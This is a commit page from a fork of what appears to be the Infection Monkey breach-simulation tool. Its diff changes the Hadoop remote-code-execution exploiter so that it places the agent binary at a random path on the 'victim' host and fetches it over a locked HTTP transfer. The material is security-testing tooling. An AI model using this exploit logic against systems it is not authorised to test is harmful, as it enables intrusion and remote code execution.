p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Use random binary destination path for Hadoop

This commit is contained in:
Ilija Lazoroski 2022-03-24 09:36:20 +01:00 committed by Mike Salvatore
parent 8d4edca419
commit db03ac3dd9
1 changed files with 4 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
monkey/infection_monkey/exploit/hadoop.py
View File

@ -12,6 +12,7 @@ import string
import requests import requests
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from infection_monkey.exploit.tools.helpers import get_agent_dest_path
from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import ( from infection_monkey.model import (
@ -43,16 +44,16 @@ class HadoopExploiter(WebRCE):
return self.exploit_result return self.exploit_result
try: try:
dropper_target_path = self.monkey_target_paths[self.host.os["type"]] monkey_path_on_victim = get_agent_dest_path(self.host, self.options)
except KeyError: except KeyError:
return self.exploit_result return self.exploit_result
http_path, http_thread = HTTPTools.create_locked_transfer( http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, dropper_target_path, self.agent_repository self.host, str(monkey_path_on_victim), self.agent_repository
) )
try: try:
command = self._build_command(dropper_target_path, http_path) command = self._build_command(monkey_path_on_victim, http_path)
if self.exploit(self.vulnerable_urls[0], command): if self.exploit(self.vulnerable_urls[0], command):
self.add_executed_cmd(command) self.add_executed_cmd(command)